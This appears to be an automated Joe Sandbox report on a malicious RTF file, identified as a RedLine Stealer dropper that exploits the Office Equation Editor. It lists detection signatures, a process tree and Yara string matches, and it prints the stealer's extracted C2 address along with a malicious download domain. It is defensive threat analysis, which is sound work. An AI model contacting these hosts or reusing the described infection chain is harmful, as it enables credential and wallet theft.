Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2MbHBiqXH2.rtf

Overview

General Information

Sample name:2MbHBiqXH2.rtf
renamed because original name is a hash value
Original sample name:2d1b096a33d1b673fd06db9f3e861761.rtf
Analysis ID:1461862
MD5:2d1b096a33d1b673fd06db9f3e861761
SHA1:3c0a1d1bd1b54381df8769ecc173e8635fea366e
SHA256:bf89362748b9e66c11aaa49ddf83b1665fe038d04225b36de4f26cffc11a0f3d
Tags:rtf
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected RedLine Stealer
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potential downloader shellcode found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1164 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2728 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • notorious53209.exe (PID: 3092 cmdline: "C:\Users\user\AppData\Roaming\notorious53209.exe" MD5: 901A623DBCCAA22525373CD36195EE14)
        • RegSvcs.exe (PID: 3116 cmdline: "C:\Users\user\AppData\Roaming\notorious53209.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
    • EQNEDT32.EXE (PID: 3300 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
2MbHBiqXH2.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2aa6e:$obj2: \objdata
  • 0x2aa88:$obj3: \objupdate
  • 0x2aa4a:$obj4: \objemb

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 10 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              5.2.notorious53209.exe.590000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                5.2.notorious53209.exe.590000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  5.2.notorious53209.exe.590000.0.raw.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x135ca:$a4: get_ScannedWallets
                  • 0x12428:$a5: get_ScanTelegram
                  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x1106a:$a7: <Processes>k__BackingField
                  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1099e:$a9: <ScanFTP>k__BackingField
                  5.2.notorious53209.exe.590000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1048a:$u7: RunPE
                  • 0x13b41:$u8: DownloadAndEx
                  • 0x9130:$pat14: , CommandLine:
                  • 0x13079:$v2_1: ListOfProcesses
                  • 0x1068b:$v2_2: get_ScanVPN
                  • 0x1072e:$v2_2: get_ScanFTP
                  • 0x1141e:$v2_2: get_ScanDiscord
                  • 0x1240c:$v2_2: get_ScanSteam
                  • 0x12428:$v2_2: get_ScanTelegram
                  • 0x124ce:$v2_2: get_ScanScreen
                  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x13509:$v2_2: get_ScanBrowsers
                  • 0x135ca:$v2_2: get_ScannedWallets
                  • 0x135f0:$v2_2: get_ScanWallets
                  • 0x13610:$v2_3: GetArguments
                  • 0x11cd9:$v2_4: VerifyUpdate
                  • 0x165ee:$v2_4: VerifyUpdate
                  • 0x139ca:$v2_5: VerifyScanRequest
                  • 0x130c6:$v2_6: GetUpdates
                  • 0x165cf:$v2_6: GetUpdates
                  5.2.notorious53209.exe.590000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 7 entries

                    Sigma Signatures

                    Exploits

                    barindex
                    Sigma detected: File Dropped By EQNEDT32EXE
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2728, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe

                    System Summary

                    barindex
                    Sigma detected: Equation Editor Network Connection
                    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 172.67.162.95, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2728, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
                    Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                    Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\notorious53209.exe, NewProcessName: C:\Users\user\AppData\Roaming\notorious53209.exe, OriginalFileName: C:\Users\user\AppData\Roaming\notorious53209.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2728, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", ProcessId: 3092, ProcessName: notorious53209.exe
                    Sigma detected: Suspicious Microsoft Office Child Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\notorious53209.exe, NewProcessName: C:\Users\user\AppData\Roaming\notorious53209.exe, OriginalFileName: C:\Users\user\AppData\Roaming\notorious53209.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2728, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", ProcessId: 3092, ProcessName: notorious53209.exe
                    Sigma detected: Modification of IE Registry Settings
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2728, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Sigma detected: Office Macro File Creation
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1164, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://universalmovies.top/Avira URL Cloud: Label: phishing
                    Source: https://universalmovies.top/(Avira URL Cloud: Label: phishing
                    Found malware configuration
                    Source: 6.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exeReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeReversingLabs: Detection: 50%
                    Multi AV Scanner detection for submitted file
                    Source: 2MbHBiqXH2.rtfReversingLabs: Detection: 36%
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exeJoe Sandbox ML: detected

                    Exploits

                    barindex
                    Office equation editor establishes network connection
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 172.67.162.95 Port: 443Jump to behavior
                    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\notorious53209.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\notorious53209.exeJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49162 version: TLS 1.2
                    Source: Binary string: wntdll.pdb source: notorious53209.exe, 00000005.00000003.358079357.0000000002950000.00000004.00001000.00020000.00000000.sdmp, notorious53209.exe, 00000005.00000003.358487589.0000000002B30000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E4696 GetFileAttributesW,FindFirstFileW,FindClose,5_2_008E4696
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_008EC9C7
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EC93C FindFirstFileW,FindClose,5_2_008EC93C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_008EF200
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_008EF35D
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_008EF65E
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_008E3A2B
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_008E3D4E
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_008EBF27

                    Software Vulnerabilities

                    barindex
                    Document exploit detected (process start blacklist hit)
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Potential downloader shellcode found
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC14B LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC14B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC0C3 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC0C3
                    Shellcode detected
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC14B LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC14B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC206 CreateProcessW,ExitProcess,2_2_005AC206
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC1CC URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC1CC
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC165 URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC165
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC23F ExitProcess,2_2_005AC23F
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC0C3 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC0C3
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC1E5 CreateProcessW,ExitProcess,2_2_005AC1E5
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC08E ExitProcess,2_2_005AC08E
                    Source: global trafficDNS query: name: universalmovies.top
                    Source: global trafficDNS query: name: api.ip.sb
                    Source: global trafficDNS query: name: api.ip.sb
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
